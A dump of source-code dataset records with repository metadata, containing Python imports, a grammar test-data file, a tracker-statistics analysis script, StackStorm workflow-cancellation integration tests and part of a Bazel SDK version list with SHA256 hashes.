| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72e7b08740de4230b24cd577cdbba822aad6a844
| 133
|
py
|
Python
|
core/platform/__init__.py
|
cmayer0087/dashzero
|
73f53577556764f93eab4406c271faab06c03aa4
|
[
"MIT"
] | 21
|
2020-02-21T21:35:10.000Z
|
2022-03-01T13:24:19.000Z
|
core/platform/__init__.py
|
shpi/homeassistant-gui
|
d6f9212ddff70a4d229c3a5efc23364cc142a27a
|
[
"MIT"
] | 7
|
2020-06-06T10:03:22.000Z
|
2021-10-30T15:13:54.000Z
|
core/platform/__init__.py
|
shpi/homeassistant-gui
|
d6f9212ddff70a4d229c3a5efc23364cc142a27a
|
[
"MIT"
] | 6
|
2020-02-21T20:57:03.000Z
|
2022-02-15T07:26:29.000Z
|
from core.platform.baseplatform import BasePlatform
from core.platform.raspberry import Raspberry
from core.platform.shpi import Shpi
| 44.333333
| 51
| 0.87218
| 18
| 133
| 6.444444
| 0.388889
| 0.206897
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082707
| 133
| 3
| 52
| 44.333333
| 0.95082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
72f1cd692ca1315295fa221fd7ddb8d0050e53ef
| 559
|
py
|
Python
|
Python/Tests/TestData/Grammar/LiteralsV2.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 695
|
2019-05-06T23:49:37.000Z
|
2022-03-30T01:56:00.000Z
|
Python/Tests/TestData/Grammar/LiteralsV2.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 1,672
|
2019-05-06T21:09:38.000Z
|
2022-03-31T23:16:04.000Z
|
Python/Tests/TestData/Grammar/LiteralsV2.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 186
|
2019-05-13T03:17:37.000Z
|
2022-03-31T16:24:05.000Z
|
1000L
u"unicode string"
U"unicode string"
ur"raw unicode"
UR"raw unicode"
Ur"raw unicode"
uR"raw unicode"
u"""unicode string"""
U"""unicode string"""
ur"""raw unicode"""
UR"""raw unicode"""
Ur"""raw unicode"""
uR"""raw unicode"""
u'unicode string'
U'unicode string'
ur'raw unicode'
UR'raw unicode'
Ur'raw unicode'
uR'raw unicode'
u'''unicode string'''
U'''unicode string'''
ur'''raw unicode'''
UR'''raw unicode'''
Ur'''raw unicode'''
uR'''raw unicode'''
u"\
\\\'\"\a\b\f\n\r\t\u2026\v\052\x2A"
u'\N{COLON}'
-2147483648l
-2147483648L
0720
-100L
0o720L
0b0101L
| 15.971429
| 35
| 0.676208
| 93
| 559
| 4.064516
| 0.236559
| 0.21164
| 0.507937
| 0.444444
| 0.806878
| 0.806878
| 0.806878
| 0.806878
| 0.806878
| 0.806878
| 0
| 0.095808
| 0.103757
| 559
| 34
| 36
| 16.441176
| 0.658683
| 0
| 0
| 0.235294
| 0
| 0
| 0.527697
| 0.081633
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f406a59c7854e0f76c523713e34696a11b37d824
| 5,237
|
py
|
Python
|
src/analysis/document_threshold_analysis.py
|
stevenzim/chiir-2019
|
8355b8de42c725130edfb7bace490ad34d351ca4
|
[
"MIT"
] | null | null | null |
src/analysis/document_threshold_analysis.py
|
stevenzim/chiir-2019
|
8355b8de42c725130edfb7bace490ad34d351ca4
|
[
"MIT"
] | null | null | null |
src/analysis/document_threshold_analysis.py
|
stevenzim/chiir-2019
|
8355b8de42c725130edfb7bace490ad34d351ca4
|
[
"MIT"
] | null | null | null |
"""Code below can be used to extract some simple descriptive statistics about the documents the user will retrieve in
results page. e.g. if document is in top quartile of privace threats"""
# Example to get statistics for participant 'TOOO1'
from src import experiment
from src import annotations
task_list = ['T1', 'T2', 'T3', 'T4', 'T5', 'T6', 'T7', 'T8', 'T9', 'T10']
# Get Descriptive statistics for each task
a = experiment.Experiment('T0001')
stats_dict = {}
for task_id in task_list:
a.task_id = task_id
a.get_task_payload()
results = a.get_task_payload()
results = results['all_results']
stats_obj = annotations.Statistics(results, 'TOTAL_TRACKERS')
print(task_id)
stats_dict[task_id] = stats_obj.__dict__
stats_dict
# Get tests of threshold results for each task (e.g. above median, tukey outliers)
from collections import Counter
from src import experiment
from src import annotations
print("_________ON TOTAL TRACKERS__________")
a = experiment.Experiment('T0001')
stats_dict = {}
results = a.get_task_payload()
results = results['all_results']
for task_id in task_list:
a.task_id = task_id
a.get_task_payload()
results = a.get_task_payload()
results = results['all_results']
stats_obj = annotations.Statistics(results, 'TOTAL_TRACKERS')
threshold_data = stats_obj.get_all_statistical_test(results, 'TOTAL_TRACKERS')
threshold_fields = ['above_mean','above_std', 'above_median', 'above_upper_quart', 'tukey_outlier']
for threshold in threshold_fields:
print(threshold)
print(Counter(map(lambda x: x[threshold], threshold_data)))
print("_________ON REMAINING_TRACKERS__________")
a = experiment.Experiment('T0001')
stats_dict = {}
results = a.get_task_payload()
results = results['all_results']
for task_id in task_list:
a.task_id = task_id
a.get_task_payload()
results = a.get_task_payload()
results = results['all_results']
print(len(results))
stats_obj = annotations.Statistics(results, 'REMAINING_TRACKERS')
threshold_data = stats_obj.get_all_statistical_test(results, 'REMAINING_TRACKERS')
threshold_fields = ['above_mean','above_std', 'above_median', 'above_upper_quart', 'tukey_outlier']
for threshold in threshold_fields:
print(threshold)
print(Counter(map(lambda x: x[threshold], threshold_data)))
# OUTPUT.... NOT A BIG DIFFERENCE
# _________ON TOTAL TRACKERS__________
# T2
# T2
# T2
# above_mean
# Counter({False: 12, True: 9})
# above_std
# Counter({False: 16, True: 5})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 21})
# _________ON REMAINING_TRACKERS__________
# T2
# T2
# T2
# above_mean
# Counter({False: 12, True: 9})
# above_std
# Counter({False: 16, True: 5})
# above_median
# Counter({False: 12, True: 9})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 21})
# _________ON TOTAL TRACKERS__________
# T5
# T5
# above_mean
# Counter({False: 12, True: 9})
# above_std
# Counter({False: 17, True: 4})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 21})
# _________ON REMAINING_TRACKERS__________
# T5
# T5
# above_mean
# Counter({False: 14, True: 7})
# above_std
# Counter({False: 18, True: 3})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 20, True: 1})
# _________ON TOTAL TRACKERS__________
# T6
# T6
# above_mean
# Counter({False: 11, True: 10})
# above_std
# Counter({False: 17, True: 4})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 21})
# _________ON REMAINING_TRACKERS__________
# T6
# T6
# above_mean
# Counter({False: 14, True: 7})
# above_std
# Counter({False: 17, True: 4})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 20, True: 1})
# _________ON TOTAL TRACKERS__________
# T8
# T8
# above_mean
# Counter({False: 11, True: 10})
# above_std
# Counter({False: 17, True: 4})
# above_median
# Counter({False: 11, True: 10})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 20, True: 1})
# _________ON REMAINING_TRACKERS__________
# T8
# T8
# above_mean
# Counter({False: 14, True: 7})
# above_std
# Counter({False: 17, True: 4})
# above_median
# Counter({False: 12, True: 9})
# above_upper_quart
# Counter({False: 16, True: 5})
# tukey_outlier
# Counter({False: 21})
# _________ON TOTAL TRACKERS__________
# T9
# T9
# above_mean
# Counter({False: 13, True: 9})
# above_std
# Counter({False: 19, True: 3})
# above_median
# Counter({True: 11, False: 11})
# above_upper_quart
# Counter({False: 16, True: 6})
# tukey_outlier
# Counter({False: 20, True: 2})
# _________ON REMAINING_TRACKERS__________
# T9
# T9
# above_mean
# Counter({False: 13, True: 9})
# above_std
# Counter({False: 18, True: 4})
# above_median
# Counter({True: 11, False: 11})
# above_upper_quart
# Counter({False: 16, True: 6})
# tukey_outlier
# Counter({False: 22})
| 25.057416
| 118
| 0.708421
| 728
| 5,237
| 4.57967
| 0.15522
| 0.172765
| 0.053989
| 0.064787
| 0.84793
| 0.845831
| 0.817037
| 0.807439
| 0.779244
| 0.779244
| 0
| 0.045055
| 0.152377
| 5,237
| 208
| 119
| 25.177885
| 0.706015
| 0.565591
| 0
| 0.78
| 0
| 0
| 0.172058
| 0.013127
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0.16
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be4df30d0912545535fbfd66402ba40d8133e32f
| 12,947
|
py
|
Python
|
st2tests/integration/mistral/test_wiring_cancel.py
|
nickbaum/st2
|
21c01c7c8c0f511ee75e3b2a3a03502472281058
|
[
"Apache-2.0"
] | 1
|
2020-11-09T21:05:33.000Z
|
2020-11-09T21:05:33.000Z
|
st2tests/integration/mistral/test_wiring_cancel.py
|
ellerbrock/st2
|
b3a0d9f82053c1fd5adb616dc8331bad427cd11f
|
[
"Apache-2.0"
] | 3
|
2021-03-26T00:29:52.000Z
|
2021-03-26T00:34:45.000Z
|
st2tests/integration/mistral/test_wiring_cancel.py
|
ellerbrock/st2
|
b3a0d9f82053c1fd5adb616dc8331bad427cd11f
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os
import shutil
import tempfile
from integration.mistral import base
from st2common.constants import action as action_constants
class CancellationWiringTest(base.TestWorkflowExecution):
temp_dir_path = None
def setUp(self):
super(CancellationWiringTest, self).setUp()
# Create temporary directory used by the tests
_, self.temp_dir_path = tempfile.mkstemp()
os.chmod(self.temp_dir_path, 0o755) # nosec
def tearDown(self):
if self.temp_dir_path and os.path.exists(self.temp_dir_path):
if os.path.isdir(self.temp_dir_path):
shutil.rmtree(self.temp_dir_path)
else:
os.remove(self.temp_dir_path)
def test_cancellation(self):
# A temp file is created during test setup. Ensure the temp file exists.
path = self.temp_dir_path
self.assertTrue(os.path.exists(path))
# Launch the workflow. The workflow will wait for the temp file to be deleted.
params = {'tempfile': path, 'message': 'foobar'}
ex = self._execute_workflow('examples.mistral-test-cancel', params)
self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
# Cancel the workflow before the temp file is created. The workflow will be paused
# but task1 will still be running to allow for graceful exit.
self.st2client.executions.delete(ex)
# Expecting the ex to be canceling, waiting for task1 to be completed.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELING)
# Delete the temporary file.
os.remove(path)
self.assertFalse(os.path.exists(path))
# Wait for the ex to be canceled.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
# Task is completed successfully for graceful exit.
self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_SUCCEEDED)
# Get the updated execution with task result.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
def test_task_cancellation(self):
# A temp file is created during test setup. Ensure the temp file exists.
path = self.temp_dir_path
self.assertTrue(os.path.exists(path))
# Launch the workflow. The workflow will wait for the temp file to be deleted.
params = {'tempfile': path, 'message': 'foobar'}
ex = self._execute_workflow('examples.mistral-test-cancel', params)
task_exs = self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
# Cancel the task execution.
self.st2client.executions.delete(task_exs[0])
# Wait for the task and parent workflow to be canceled.
self._wait_for_task(ex, 'task1', action_constants.LIVEACTION_STATUS_CANCELED)
# Get the updated execution with task result.
ex = self._wait_for_state(ex, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_cascade_to_subworkflow_action(self):
    """Canceling the parent workflow cascades into the subworkflow action."""
    # setUp created a temp file; the workflow blocks until it disappears.
    tmp_path = self.temp_dir_path
    self.assertTrue(os.path.exists(tmp_path))

    # Launch the workflow; it waits on the temp file being deleted.
    inputs = {'tempfile': tmp_path, 'message': 'foobar'}
    execution = self._execute_workflow(
        'examples.mistral-test-cancel-subworkflow-action', inputs)
    running_tasks = self._wait_for_task(
        execution, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
    subworkflow = running_tasks[0]

    # Cancel the parent while task1 still runs; both the parent and the
    # subworkflow move to canceling to allow a graceful exit.
    self.st2client.executions.delete(execution)
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_CANCELING)
    subworkflow = self._wait_for_state(subworkflow, action_constants.LIVEACTION_STATUS_CANCELING)

    # Removing the temp file lets the blocked task complete.
    os.remove(tmp_path)
    self.assertFalse(os.path.exists(tmp_path))

    # Both executions settle into the canceled state.
    subworkflow = self._wait_for_state(subworkflow, action_constants.LIVEACTION_STATUS_CANCELED)
    # Re-fetch so the returned execution carries the final task result.
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_cascade_to_subchain(self):
    """Canceling the parent workflow cascades into the action-chain child."""
    # setUp created a temp file; the workflow blocks until it disappears.
    tmp_path = self.temp_dir_path
    self.assertTrue(os.path.exists(tmp_path))

    # Launch the workflow; it waits on the temp file being deleted.
    inputs = {'tempfile': tmp_path, 'message': 'foobar'}
    execution = self._execute_workflow(
        'examples.mistral-test-cancel-subworkflow-chain', inputs)
    running_tasks = self._wait_for_task(
        execution, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
    subworkflow = running_tasks[0]

    # Cancel the parent while task1 still runs; both the parent and the
    # subchain move to canceling to allow a graceful exit.
    self.st2client.executions.delete(execution)
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_CANCELING)
    subworkflow = self._wait_for_state(subworkflow, action_constants.LIVEACTION_STATUS_CANCELING)

    # Removing the temp file lets the blocked task complete.
    os.remove(tmp_path)
    self.assertFalse(os.path.exists(tmp_path))

    # Both executions settle into the canceled state.
    subworkflow = self._wait_for_state(subworkflow, action_constants.LIVEACTION_STATUS_CANCELED)
    # Re-fetch so the returned execution carries the final task result.
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_cascade_from_subworkflow_action(self):
    """Canceling the subworkflow action propagates up to the parent."""
    # setUp created a temp file; the workflow blocks until it disappears.
    tmp_path = self.temp_dir_path
    self.assertTrue(os.path.exists(tmp_path))

    # Launch the workflow; it waits on the temp file being deleted.
    inputs = {'tempfile': tmp_path, 'message': 'foobar'}
    execution = self._execute_workflow(
        'examples.mistral-test-cancel-subworkflow-action', inputs)
    running_tasks = self._wait_for_task(
        execution, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
    subworkflow = running_tasks[0]

    # Cancel the child subworkflow directly.
    self.st2client.executions.delete(subworkflow)

    # Both the child and the parent workflow move to canceling.
    subworkflow = self._wait_for_state(subworkflow, action_constants.LIVEACTION_STATUS_CANCELING)
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_CANCELING)

    # Removing the temp file lets the blocked task complete.
    os.remove(tmp_path)
    self.assertFalse(os.path.exists(tmp_path))

    # Both executions settle into the canceled state.
    subworkflow = self._wait_for_state(subworkflow, action_constants.LIVEACTION_STATUS_CANCELED)
    # Re-fetch so the returned execution carries the final task result.
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_cascade_from_subchain(self):
    """Canceling the subchain child propagates up once the child finishes."""
    # setUp created a temp file; the workflow blocks until it disappears.
    tmp_path = self.temp_dir_path
    self.assertTrue(os.path.exists(tmp_path))

    # Launch the workflow; it waits on the temp file being deleted.
    inputs = {'tempfile': tmp_path, 'message': 'foobar'}
    execution = self._execute_workflow(
        'examples.mistral-test-cancel-subworkflow-chain', inputs)
    running_tasks = self._wait_for_task(
        execution, 'task1', action_constants.LIVEACTION_STATUS_RUNNING)
    subworkflow = running_tasks[0]

    # Cancel the child subchain directly.
    self.st2client.executions.delete(subworkflow)

    # The child moves to canceling; the parent keeps running until the
    # canceled child actually completes.
    subworkflow = self._wait_for_state(subworkflow, action_constants.LIVEACTION_STATUS_CANCELING)
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_RUNNING)

    # Removing the temp file lets the blocked task complete.
    os.remove(tmp_path)
    self.assertFalse(os.path.exists(tmp_path))

    # Both executions settle into the canceled state.
    subworkflow = self._wait_for_state(subworkflow, action_constants.LIVEACTION_STATUS_CANCELED)
    # Re-fetch so the returned execution carries the final task result.
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_chain_cascade_to_subworkflow(self):
    """Canceling an action chain cascades into its mistral subworkflow."""
    # setUp created a temp file; the workflow blocks until it disappears.
    tmp_path = self.temp_dir_path
    self.assertTrue(os.path.exists(tmp_path))

    # Launch the chain; its subworkflow waits on the temp file being deleted.
    inputs = {'tempfile': tmp_path, 'message': 'foobar'}
    execution = self._execute_workflow(
        'examples.chain-test-cancel-with-subworkflow', inputs)
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_RUNNING)

    # Cancel the chain; it moves to canceling while its child runs on
    # to allow a graceful exit.
    self.st2client.executions.delete(execution)
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_CANCELING)

    # Action chains expose no mistral-style task context, so query the
    # chain's children to locate the subworkflow execution.
    children = self._get_children(execution)
    self.assertEqual(len(children), 1)
    subworkflow = self._wait_for_state(children[0], action_constants.LIVEACTION_STATUS_CANCELING)

    # Removing the temp file lets the blocked task complete.
    os.remove(tmp_path)
    self.assertFalse(os.path.exists(tmp_path))

    # Both executions settle into the canceled state.
    subworkflow = self._wait_for_state(subworkflow, action_constants.LIVEACTION_STATUS_CANCELED)
    # Re-fetch so the returned execution carries the final task result.
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_CANCELED)
def test_cancellation_chain_cascade_from_subworkflow(self):
    """Canceling the chain's subworkflow propagates up once it finishes."""
    # setUp created a temp file; the workflow blocks until it disappears.
    tmp_path = self.temp_dir_path
    self.assertTrue(os.path.exists(tmp_path))

    # Launch the chain; its subworkflow waits on the temp file being deleted.
    inputs = {'tempfile': tmp_path, 'message': 'foobar'}
    execution = self._execute_workflow(
        'examples.chain-test-cancel-with-subworkflow', inputs)
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_RUNNING)

    # Action chains expose no mistral-style task context, so query the
    # chain's children to locate the subworkflow execution, then cancel it.
    children = self._get_children(execution)
    self.assertEqual(len(children), 1)
    subworkflow = self._wait_for_state(children[0], action_constants.LIVEACTION_STATUS_RUNNING)
    self.st2client.executions.delete(subworkflow)

    # The child moves to canceling; the chain keeps running until the
    # canceled child actually completes.
    subworkflow = self._wait_for_state(subworkflow, action_constants.LIVEACTION_STATUS_CANCELING)
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_RUNNING)

    # Removing the temp file lets the blocked task complete.
    os.remove(tmp_path)
    self.assertFalse(os.path.exists(tmp_path))

    # Both executions settle into the canceled state.
    subworkflow = self._wait_for_state(subworkflow, action_constants.LIVEACTION_STATUS_CANCELED)
    # Re-fetch so the returned execution carries the final task result.
    execution = self._wait_for_state(execution, action_constants.LIVEACTION_STATUS_CANCELED)
| 46.405018
| 98
| 0.709585
| 1,757
| 12,947
| 5.010814
| 0.103586
| 0.04373
| 0.048728
| 0.137324
| 0.849159
| 0.848364
| 0.848364
| 0.848364
| 0.848364
| 0.848364
| 0
| 0.004441
| 0.217348
| 12,947
| 278
| 99
| 46.571942
| 0.864403
| 0.341006
| 0
| 0.759399
| 0
| 0
| 0.063432
| 0.038817
| 0
| 0
| 0
| 0
| 0.12782
| 1
| 0.075188
| false
| 0
| 0.045113
| 0
| 0.135338
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be5186a8699ba3aa6f1e58fd9af1f8f088f3d1c2
| 350
|
py
|
Python
|
data_loader/__init__.py
|
ghhabib2/mPower_Project
|
3404bc84d0f756bb9fee0891c255307b23214d7c
|
[
"MIT"
] | null | null | null |
data_loader/__init__.py
|
ghhabib2/mPower_Project
|
3404bc84d0f756bb9fee0891c255307b23214d7c
|
[
"MIT"
] | null | null | null |
data_loader/__init__.py
|
ghhabib2/mPower_Project
|
3404bc84d0f756bb9fee0891c255307b23214d7c
|
[
"MIT"
] | null | null | null |
from data_loader.data_loader import DataLoader
from data_loader.load_tapping_data import TappingDataLoader
from data_loader.load_memory_data import MemeoryDataLoader
from data_loader.load_walking_data import WalkingDataLoader
from data_loader.load_voice_data import VoiceDataLoader
from data_loader.load_accumulated_data import AccumulatedDataLoader
| 50
| 67
| 0.914286
| 47
| 350
| 6.446809
| 0.340426
| 0.231023
| 0.277228
| 0.29703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068571
| 350
| 6
| 68
| 58.333333
| 0.929448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
be71b526a10d997ea52538027ee9ce51fcf32166
| 243
|
py
|
Python
|
graph_weather/models/__init__.py
|
openclimatefix/graph_weather
|
e00b75418d62181d213fede2925bb100b4091f57
|
[
"MIT"
] | 6
|
2022-02-25T09:27:57.000Z
|
2022-03-28T22:26:56.000Z
|
graph_weather/models/__init__.py
|
openclimatefix/graph_weather
|
e00b75418d62181d213fede2925bb100b4091f57
|
[
"MIT"
] | 11
|
2022-02-25T08:24:17.000Z
|
2022-03-30T18:31:16.000Z
|
graph_weather/models/__init__.py
|
openclimatefix/graph_weather
|
e00b75418d62181d213fede2925bb100b4091f57
|
[
"MIT"
] | null | null | null |
"""Models"""
from .layers.assimilator_decoder import AssimilatorDecoder
from .layers.assimilator_encoder import AssimilatorEncoder
from .layers.decoder import Decoder
from .layers.encoder import Encoder
from .layers.processor import Processor
| 34.714286
| 58
| 0.847737
| 28
| 243
| 7.285714
| 0.357143
| 0.245098
| 0.205882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08642
| 243
| 6
| 59
| 40.5
| 0.918919
| 0.024691
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
be91aae3692083c837250ea5fcb2595913e45b71
| 74
|
py
|
Python
|
python/testData/addImport/newFromImportFromSameModule.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/addImport/newFromImportFromSameModule.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/addImport/newFromImportFromSameModule.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
from mod import a
from mod import b
from mod import c, a
from mod import d
| 18.5
| 20
| 0.77027
| 17
| 74
| 3.352941
| 0.411765
| 0.491228
| 0.912281
| 0.491228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.216216
| 74
| 4
| 21
| 18.5
| 0.982759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
beaffa07ee6169e99b3c7d3fd3ea2374d0ffa83d
| 7,392
|
bzl
|
Python
|
compatibility/versions.bzl
|
sofusmortensen/daml
|
33fe0ca3d90affdb79e16f8b43cb751d9b7cdb9a
|
[
"Apache-2.0"
] | null | null | null |
compatibility/versions.bzl
|
sofusmortensen/daml
|
33fe0ca3d90affdb79e16f8b43cb751d9b7cdb9a
|
[
"Apache-2.0"
] | null | null | null |
compatibility/versions.bzl
|
sofusmortensen/daml
|
33fe0ca3d90affdb79e16f8b43cb751d9b7cdb9a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# This file is autogenerated and should not be modified manually.
# Update versions/UpdateVersions.hs instead.
sdk_versions = [
"1.0.0",
"1.0.1",
"1.1.1",
"1.2.0",
"1.3.0",
"1.4.0",
"1.5.0",
"1.6.0-snapshot.20200908.5166.0.1623baec",
"1.6.0-snapshot.20200915.5208.0.09014dc6",
"0.0.0",
]
platform_versions = [
"1.0.0",
"1.0.1",
"1.1.1",
"1.2.0",
"1.3.0",
"1.4.0",
"1.5.0",
"1.6.0-snapshot.20200908.5166.0.1623baec",
"1.6.0-snapshot.20200915.5208.0.09014dc6",
"0.0.0",
]
stable_versions = [
"1.0.0",
"1.0.1",
"1.1.1",
"1.2.0",
"1.3.0",
"1.4.0",
"1.5.0",
"0.0.0",
]
latest_stable_version = "1.5.0"
version_sha256s = {
"1.0.0": {
"linux": "ee7e2f50394d44fb3490068de64d37f4f87534e802717bd7e07e8767df2e4e05",
"macos": "feb2086a9a01048300270c71eb212c8541cdec1082f541408250d6124bc307a8",
"windows": "2028efe1f505c1994e1abc41c0fb5181669cd46834818aa8276d04b0fb6eb034",
"test_tool": "cf66efafd9490e1256e825f377b208b8ae90151f56e411b596fbaaef91353e14",
"daml_types": "f85e5dd7ef1c5733826c1c79e316d2733344ac0da67f0d381ba70fc83a64fc78",
"daml_ledger": "5aab9a6cbdc987fc4279481152ff65bda503425f7e338c5123237b283aae44d6",
"daml_react": "30ab9db8a20df6cbfed7c1b42a45ca0ea55af6e150c013105d46c94afa5f9a46",
},
"1.0.1": {
"linux": "9cff04c29bb28503b41dcde310a2f3307984b1d976f8bccfb38268672e730c8f",
"macos": "a7e094e2d8766c852a247e0601b7c062c435b0d91f9ab256bbf4fcb40971ee36",
"windows": "41ecd44f3ea7c2a64a7f677f36b3f26dabaa5de913bc57bd680ea8f40f00ff0b",
"test_tool": "038de725b74f128fc0cb6f3ce8eef7d62da9527d0cbf25b93b7c1623bbb413c9",
"daml_types": "c50d5f37dbb42f45ae1f4f4013a72006ae7bbd531c68c363b54212a3458c5b6e",
"daml_ledger": "12fc3ef723171162128fb5951dec5452f75b1a3de7facf85a2b0126f46de159b",
"daml_react": "dc4cbf95f22cc0300af1f450be316bd55ebbc2816e9806231b13edce85bea44c",
},
"1.1.1": {
"linux": "1e396287b7462147d182fd2c536a5ee03163e3efeefc989d368b1dfc01a40a97",
